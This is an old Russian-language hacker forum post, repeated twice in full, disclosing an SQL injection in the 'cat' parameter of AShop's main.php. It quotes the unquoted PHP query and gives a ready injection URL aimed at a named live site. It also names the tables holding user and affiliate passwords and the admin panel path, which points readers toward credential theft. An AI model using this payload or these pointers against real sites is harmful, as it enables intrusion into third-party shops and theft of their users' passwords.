[53x]Shadow
07.09.2007, 04:07
AShop - онлайн магазин с поддержкой партнерской программы с открытым кодом продается на плати.ру. (Не путать с ASHOP Software).
Возможна SQL-инъекция в параметре $cat в main.php.
Пример уязвимой части скрипта:
.......
// List categories...
if ($cat) {
$sql="SELECT parentcategoryid from category WHERE categoryid = $cat";
$result = @mysql_query($sql,$db);
$parent = @mysql_result($result, 0, "parentcategoryid");
}
........
$cat не обрамляется кавычками, передается через GET параметры.
Пример использования уязвимости, правда на 3 мускуле:
http://muzplakat.ru/main.php?cat=6+/*!32358+and+0+*/
Таблицы: affiliate(user,password,mail) и user(user, password).
Админка: /admin/index.php
ЗЫ
Скрипт не особо распространен в сети =\
ЗЗЫ
Спасибо Alexsize, за предоставленные скрипты магаза =)
Возможна SQL-инъекция в параметре $cat в main.php.
Пример уязвимой части скрипта:
.......
// List categories...
if ($cat) {
$sql="SELECT parentcategoryid from category WHERE categoryid = $cat";
$result = @mysql_query($sql,$db);
$parent = @mysql_result($result, 0, "parentcategoryid");
}
........
$cat не обрамляется кавычками, передается через GET параметры.
Пример использования уязвимости, правда на 3 мускуле:
http://muzplakat.ru/main.php?cat=6+/*!32358+and+0+*/
Таблицы: affiliate(user,password,mail) и user(user, password).
Админка: /admin/index.php
ЗЫ
Скрипт не особо распространен в сети =\
ЗЗЫ
Спасибо Alexsize, за предоставленные скрипты магаза =)